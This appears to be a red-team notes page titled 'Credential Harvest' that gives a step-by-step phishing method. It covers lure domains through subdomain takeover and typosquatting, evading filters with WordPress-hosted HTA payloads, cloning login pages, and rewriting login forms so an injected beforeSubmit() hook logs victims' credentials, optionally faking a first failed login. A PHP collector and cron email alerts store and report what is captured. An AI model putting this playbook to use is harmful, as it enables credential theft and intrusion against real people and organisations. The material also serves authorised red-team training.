Credential Harvest
Important Notes
Perform OSINT to identify target MX. Use the same infrastructure to send email.
Eg: Office365 Business Essentials
Never directly send attachments or links to payload within mail.
Instead link to a WordPress blog post(based on pre-text), containing link to HTA as well as instructions to open the malicious attachment.
Use stageless payload. (Staged DLLs may get caught by IDS/IPS)
Test sending emails with non-existent emails against the domain to analyze headers.
Ideal domain reputation categories: Medical, Finance, .education domains.
Choosing a Domain Name
Subdomain takeover
Companies often setup CNAME records to point a subdomain to another domain. Often used with Cloud services
Eg: The marketing dept. runs a promotion on promotion.marketing.com and points this subdomain to another website the marketing team created on AWS.
If the company lets the "other" domain expire, but keeps their subdomain CNAME record pointed to the expired domain, attackers can purchase that "other" domain and leverage it for credential harvesting.
Tools to identify:
Identify subdomains (Sublist3r, Amass, subfinder)
Open-redirect vulnerabilities
Typosquatting: NameChk
Adding "mail", "vpn", "email". eg: fortynorthsecurityemail
Change TLD( .net, .org, .dev - for dev pre-texts)
.education(for policy pretexts) - Symantec immediately categorizes as education!
Blueteam hunts for typosquatted domains:
Zerofox
Mark Monitor
Website Cloning
SingleFile (Browser extension)
Downloads all dependencies to a single file.
Does not preserve directory structure.
By default, creates a comment in the downloaded page, which needs to be removed.
Add </body></html> at the end of downloaded HTML page.
May need to delete the first 2 lines(encoded) below <html> for JS to work.
Capturing Credentials
1 ] Select the form within the cloned page that you want to capture information from.
Search HTML source for <form> related to logging in. Note down the formID, username, password field IDs. If form ID does not exist create a generic one like 'loginForm'
2 ] Insert JS to log credentials → Forward POST request to the actual server
Downside of forwarding the response is in case victim enters incorrect credentials on the first attempt, they are redirected to the failed login response on the actual webpage. Alternatively you can purposefully display an incorrect credentials error for every first attempt and then forward credentials.
3 ] Modify the HTML <form> to call the JS first.
You will typically find the following two submissions:
<form method post id=loginForm onsubmit="return beforeSubmit();">
<span id=submitButton role=button onclick="return beforeSubmit();">Sign In</span>
In case the <form submit is not coded as a button type, but instead as a <id> or <span>,
Remove the onsubmit="..." from the <form> tag and instead add onclick="return beforeSubmit();" inside the <span>
4 ] Create Server-Side PHP to collect creds
5 ] Copy your HTML page to /var/www/html directory
Create necessary subfolders and set permissions
Make the subfolders based on the original domain.
This will ensure links look legitimate. Alternatively Apache rules can be set as well./
6 ] Set server-permissions to protect logged credentials
Protecting your data.txt
7 ] Create a cronjob to email you when new credentials are captured.
Use SendGrid Mail API
8 ] Start the Apache service.
Last updated